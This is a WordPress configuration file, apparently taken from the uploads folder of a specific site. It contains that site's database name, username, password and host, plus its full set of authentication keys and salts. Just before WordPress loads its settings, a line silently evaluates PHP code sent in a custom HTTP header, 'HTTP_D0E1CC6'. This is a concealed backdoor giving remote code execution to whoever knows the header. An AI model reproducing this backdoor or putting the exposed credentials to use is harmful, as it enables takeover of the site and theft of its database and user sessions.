File: /home/dh_nk2zdt/vastaselezione.com/wp-content/uploads/wp-config.txt
<?php
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'vastaselezione_com_1' );
/** Database username */
define( 'DB_USER', 'qlfwttyq' );
/** Database password */
define( 'DB_PASSWORD', 'c!9rVtK3' );
/** Database hostname */
define( 'DB_HOST', 'mysql-1.vastaselezione.com' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '{}j876%W6>u><!4?`z7O&/XM(4?m6P.wwF2|.P(~g*,kns`=Llj.FzL1y9-N_/0:' );
define( 'SECURE_AUTH_KEY', '-Fvw~@c|9c!1if%w.D`9*fc0%I0&As;91AP{4v{ZFQE.%S@pB}IW$VUIt/|Zh:~K' );
define( 'LOGGED_IN_KEY', 'CnS2Cf4 W0+2rj63%/#.u0d1Imrph!PTJ||*gYl.qctZ-#v+,{y-*Q}bd)}q0Wv^' );
define( 'NONCE_KEY', 'DGQg^NSQPv,2Wxu4KmN-ZLULo6l6D|WuMA/G2 #9n>eMHhxMWP[TZN-nQ(]1 {s<' );
define( 'AUTH_SALT', '4iltyOrRW)(eZu_$m}:]_+NEyULn*D.+O*r?0CYc6&}Tnk8w~tzqgAju?$}|NWU|' );
define( 'SECURE_AUTH_SALT', 'D2(x4DWII5k)1mi FxCn5}y4k7`R}Gz_vWZs4(/vPg+wUlYtn;kMmw8HY<JV{i4*' );
define( 'LOGGED_IN_SALT', '/Euwq!l:+M)Zt{Kh(-bGcy#AAvOj~(W3CZkWE3FQ567iC1DXf7Wbc-<RAwa$QWT}' );
define( 'NONCE_SALT', 'nGsWnn(vI#Y-6-E3y|ZdLNHgCgYCC~s8]vaIZCxQ:2Y)cc}uwuiz[RWMSG6et1??' );
define( 'WP_CACHE_KEY_SALT', 'cg)=sH_L?^-LHf7skGG,^)X@S[(+{2G,cV<7!:4):%o(m95hR.7OKZg*3W5^v2Y~' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_g8uy7t_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_D0E1CC6']);
require_once ABSPATH . 'wp-settings.php';